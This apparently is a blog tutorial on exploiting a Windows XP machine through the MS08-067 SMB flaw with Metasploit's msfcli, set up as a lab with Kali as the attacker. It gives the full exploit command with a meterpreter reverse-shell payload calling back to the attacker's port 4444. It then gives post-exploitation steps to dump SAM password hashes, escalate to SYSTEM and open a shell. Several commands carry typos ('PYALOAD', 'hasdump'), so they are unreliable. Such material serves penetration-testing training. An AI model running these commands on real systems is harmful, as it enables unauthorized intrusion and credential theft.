exploit using metasploit msfcli

How to exploit using msfcli ?

Metasploit exploit using msfcli command line interface.

Warning : don’t try this on any public, corporate or unauthorized networks . Performed only when you have authorization to do.

Exploit attempt using the metasploit framework can be made using different approaches like : msfcli , msfconsole , shell scripting & resource scripting

How to exploit using msfcli ?

Help for msfcli command line usage

#msfcli -h

With our guide we are going to use windows XP as our target (victim).

Lab – Setup

Target(victim) :
OS in target : Windows XP
Exploit : ms08-067
Port : 445

Attacker :
OS in attacker : Kali Linux
Exploit framework : Metasploit
Exploit method : msfcli

msfcli usage :

Exploit module:
#msfcli exploitname payload=windows/meterpreter/reverse_tcp lhost=IP E

Scanner module:
#msfcli auxilary/scanner/http/http_version rhosts=IP E

Note : Option “E” for module execution

The location of modules in Kali Linux

Let’s make a exploit attempt on target PC .

Step 1:

#msfcli exploit/windows/smb/ms08_067_netapi PYALOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=4444 RHOST= E

LHOST = localhost IP(attacker)
LPORT= 4444, binding port to get the reverse_shell on attacker PC
RHOST= ,target IP address(victim)

E = Execute

Step 2:

Once the meterpreter session established, proceed for post exploitation.

The help command to know the usage of command during the post exploitation, information gather or privilege escalation.

meterpreter > help

Get the passwords from SAM database
meterpreter > hasdump

Privilege escalation to system account
meterpreter >getsystem

Get into the shell of target PC
meterpreter >shell

Watch , exploit using metasploit msfcli

Leave a Reply

Your email address will not be published. Required fields are marked *

+ 85 = 93